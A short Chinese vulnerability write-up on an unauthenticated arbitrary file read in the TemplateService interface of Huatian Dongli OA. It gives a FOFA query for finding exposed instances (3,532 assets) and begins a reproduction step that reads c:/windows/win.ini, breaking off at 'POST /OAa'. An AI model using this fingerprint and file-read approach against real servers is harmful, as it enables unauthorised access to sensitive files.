产品简介
华天动力OA是一款将先进的管理思想、 管理模式和软件技术、网络技术相结合,为用户提供了低成本、 高效能的协同办公和管理平台。
漏洞描述
华天动力OA TemplateService接口处存在任意 文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
fofa及漏洞编号
app=”华天动力-OA8000”
影响资产数量:3,532
CNVD漏洞编号:无
影响版本
华天动力oa系统
漏洞复现
发送数据包,读取c:/windows/win.ini文件内容
POST /OAa